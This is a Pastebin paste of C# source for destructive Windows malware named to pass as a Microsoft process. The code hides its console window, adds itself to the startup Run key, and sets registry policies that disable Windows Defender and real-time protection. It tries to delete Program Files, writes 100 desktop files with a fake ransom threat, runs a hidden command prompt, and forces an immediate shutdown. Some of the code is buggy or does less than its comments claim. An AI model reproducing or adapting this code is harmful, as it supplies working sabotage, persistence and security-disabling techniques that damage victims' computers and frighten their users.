Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- using System;
- using System.Collections.Generic;
- using System.Linq;
- using System.Runtime.InteropServices;
- using System.Text;
- using System.Threading.Tasks;
- using System.Threading;
- using System.Windows.Forms;
- using Microsoft.Win32;
- using System.Diagnostics;
- using System.Security.Principal;
- using System.IO;
- namespace Microsoft_Network_Brooker
- {
- class Program
- {
- [DllImport("kernel32.dll")]
- static extern IntPtr GetConsoleWindow();
- [DllImport("user32.dll")]
- static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
- public static string ApplacationName = Process.GetCurrentProcess().ProcessName;
- static string RWFileNames;
- static string WRFileNames;
- static string path = Environment.GetFolderPath(Environment.SpecialFolder.Desktop);
- static string Username = Environment.UserName;
- static Random rnd = new Random();
- static void Main(string[] args)
- {
- const int SW_HIDE = 0;
- const int SW_SHOW = 5;
- var handle = GetConsoleWindow();
- ;
- ;
- ShowWindow(handle, SW_HIDE); // To hide
- CopyToStartup();
- Disable_windowsDefender();
- CreateFilesAndDestroy();
- /*
- *
- This part will destroy the computer
- */
- CMDcommands();
- shutdown();
- }
- static void Disable_windowsDefender()
- {
- Console.WriteLine("Attempting to disable windows defender...");
- try
- {
- Registry.LocalMachine.CreateSubKey(@"SOFTWARE\Policies\Microsoft\Windows Defender", RegistryKeyPermissionCheck.ReadWriteSubTree).SetValue("DisableAntiSpyware", "00000001", RegistryValueKind.DWord);
- }
- catch (Exception Error)
- {
- Console.WriteLine("Error| Error message: " + Error.Message);
- }
- Thread.Sleep(20);// i have to give it some time or else it wont let me and can throw errors
- Console.WriteLine("Attempting to disable other antivirus settings temparaly");// disable realtime protection etc
- try
- {
- Registry.LocalMachine.CreateSubKey(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", RegistryKeyPermissionCheck.ReadWriteSubTree).SetValue("DisableBehaviorMonitoring", "00000001", RegistryValueKind.DWord);
- Registry.LocalMachine.CreateSubKey(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", RegistryKeyPermissionCheck.ReadWriteSubTree).SetValue("DisableOnAccessProtection", "00000001", RegistryValueKind.DWord);
- Registry.LocalMachine.CreateSubKey(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", RegistryKeyPermissionCheck.ReadWriteSubTree).SetValue("DisableScanOnRealtimeEnable", "00000001", RegistryValueKind.DWord);
- }
- catch (Exception Error1)
- {
- Console.WriteLine("ERROR | Error message: " + Error1.Message);
- }
- }
- static void CMDcommands()// will open a cmd silently and will try and delete system32 folder... LOL
- {
- try
- {
- Process cmd = new Process();
- cmd.StartInfo.FileName = "cmd.exe";
- cmd.StartInfo.RedirectStandardInput = true;
- cmd.StartInfo.RedirectStandardOutput = true;
- cmd.StartInfo.CreateNoWindow = true;
- cmd.StartInfo.UseShellExecute = false;
- cmd.Start();
- //-----------------//
- cmd.StandardInput.WriteLine(@"cacls C:\Windows\System32");///
- cmd.StandardInput.Flush();
- cmd.StandardInput.Close();
- cmd.WaitForExit();
- Console.WriteLine(cmd.StandardOutput.ReadToEnd());
- Thread.Sleep(8000);
- }
- catch
- {
- }
- }
- //-----------------//
- static void CreateFilesAndDestroy()// im still working on this part but it will destroy random system files and it creates files on the desktop with a spooky message
- {
- try
- {
- System.IO.File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles));
- }
- catch
- (IOException ex)
- {
- }
- int i = 0;
- while(i < 100)
- {
- try
- {
- i++;
- StreamWriter writer1 = new StreamWriter(path + @"\YOUR COMPUTER WILL GET DESTROYED" + rnd.Next(1000, 9999) + ".txt");
- writer1.WriteLine("Hello " + Username + " We have hijacked your computer and all your files have been sent to a secure database that only we have access too the key to access the server is hiddent somewhere in your memory and will fisapear in 24 hours or next computer restart" + " SSASH Key: " + rnd.Next(10000,999999));
- //^^spooky message not really going to be uploaded to a database im not a loser
- writer1.Close();
- Console.WriteLine("New File created!");
- Thread.Sleep(10);
- }
- catch
- (Exception ex)
- {
- }
- }
- }
- static void shutdown() // this is at the end of the payload.. it will shutdown the computer, this is safe and can be done on any user level eg. user, admin etc
- {
- try
- {
- var psi = new ProcessStartInfo("shutdown", "/s /t 0");//starts the shutdown proccess
- psi.CreateNoWindow = true;
- psi.UseShellExecute = false;//this is what makes it safe it will
- Process.Start(psi);
- }
- catch { }
- }
- static void CopyToStartup()
- {
- try
- {
- RegistryKey registryKey = Registry.CurrentUser.OpenSubKey
- ("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
- registryKey.SetValue(ApplacationName, Application.ExecutablePath);
- }
- catch(Exception)
- {
- }
- }
- public bool IsStartupItem()
- {
- // The path to the key where Windows looks for startup applications
- RegistryKey rkApp = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
- if (rkApp.GetValue(ApplacationName) == null)
- {
- // The value doesn't exist, the application is not set to run at startup
- CopyToStartup();
- return false;
- }
- else
- {
- // The value exists, the application is set to run at startup
- return true;
- }
- }
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement